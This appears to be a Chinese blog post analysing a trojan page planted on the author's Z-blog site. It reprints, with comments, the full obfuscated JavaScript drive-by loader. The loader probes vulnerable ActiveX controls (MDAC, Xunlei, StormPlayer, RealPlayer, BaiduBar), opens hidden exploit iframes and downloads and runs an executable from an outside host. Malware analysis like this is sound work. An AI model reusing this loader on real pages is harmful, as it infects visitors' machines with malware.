always there for you

     今天突然想起上次的木马还没有研究下(详情请看: [Z-blog被挂马了] )!.

     打开news.htm,我们一点一点来分析,发现都是利用最近的第三方组件的漏洞!...    

    第一行是:

    <script>window.onerror=function(){return true;}</script>

    //这是把JS错误给屏蔽掉,来达到隐藏自己的目的!.

    以下是正文了,为了方便大家观看,我进行了排版和注释!.

<script>
window.defaultStatus="枨圜";
    //设置状态栏的文字

try
{
    var e;
    var ado=(document.createElement("object"));
    var kav="\x32\x30\x30\x38\x30\x33\x32\x39";   
     //进行了16进制加密,解密后为20080329
    //晕.记着那天的日期,关于解密,不会的请到最下方查看

    ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
    var as=ado.createobject("Adodb.Stream","")
    //是MS06-014漏洞[Microsoft Data Access Components (MDAC) 功能中的漏洞可能允许执行代码],利用ado.stream对象生成一个可执行文件,再用shell调用可执行文件达到病毒植入的目的

}
catch(e){};
finally
{
    //如果没有报错
    if (e!="[object Error]")
    {
          //晕.又来.下面还有好几个.我都下下来.看下.其中只有"xl.htm"没有下下来
           document.write('<iframe style=display:none src="06014.htm"></iframe>')
    }
    //如果报错
    else
    {
           try
           { 
                var f;
                var thunder=new ActiveXObject("DPClient.Vod");    
                //上网搜了下DPClient.Vod是迅雷的漏洞
           }
           catch(f){};
           finally
           { 
                   //如果创建迅雷组件没有出错
                   if (f!="[object Error]")
                   {
                        document.write('<iframe style=display:none src="xl.htm"></iframe>')
                   }
           }

          try
          {
                 var g;
                 var glworld=new ActiveXObject("GLCHAT.GLChatCtrl.1");
                 //GLCHAT.GLChatCtrl.1 联众游戏聊天室组件漏洞
          }
          catch(g){};
          finally
          {
                  //如果创建联众游戏聊天室组件没有出错
                  if (g!="[object Error]")
                  {
                         document.write('<iframe style=display:none src="lz.htm"></iframe>')
                  }
          }

         try
         {
                 var h;
                 var storm=new ActiveXObject("MPS.StormPlayer.1");
                 //MPS.StormPlayer 暴风影音的漏洞,下面我就不解释了
         }
         catch(h){};
         finally
         {
                 if (h!="[object Error]")
                 {
                         document.write('<iframe style=display:none src="bfyy.htm"></iframe>')
                 }
         }
 
         try
         {
                 var i;
                 var real=new ActiveXObject("IERPCtl.IERPCtl.1");
                 //IERPCtl.IERPCtl.1 realplayer的漏洞
         }
         catch(i){};
         finally
         {
                 if (i!="[object Error]")
                 {
                       document.write('<iframe style=display:none src="real17.htm"></iframe>')
                       document.write('<iframe style=display:none src="real2.htm"></iframe>')
                 }
         }

         try
         {
                   var j;
                   var Baidu=new ActiveXObject("\x42\x61\x69\x64\x75\x42\x61\x72\x2e\x54\x6f\x6f\x6c");
                   //解码后为BaiduBar.Tool -很明显这是百度超级搜霸漏洞
         }
         catch(j){};
         finally
         {
                    if (j!="[object Error]")
                    {
 Baidu["\x44\x6c\x6f\x61\x64\x44\x53"]("http://www.1tsun.cn/dir/index_pic/Baidu.cab", "\x42\x61\x69\x64\x75\x2e\x65\x78\x65", 0)
 //第一个参数为:DloadDS  第三个参数为:Baidu.exe
                    }
         }
        
        //如果都创建失败
         if (f=="[object Error]" && g=="[object Error]" && h=="[object Error]" && i=="[object Error]" && j=="[object Error]")
         {
                      location.replace("about:blank");
                      //replace 方法，该方法通过指定URL替换当前缓存在历史里（客户端）的项目，因此当使用replace方法之后，你不能通过“前    
                     //进”和“后退”来访问已经被替换的URL。
         }
   }
}
/*Extreme*/
</script>

<!--附录-->
1.解密
     ○ 打开UltraEdit-32
     ○ 把/x32这样的粘贴进去
     ○ 点击上方的替换工具替换所有的"/x"为"%"

     ○ 点击下方的HTML解码工具解码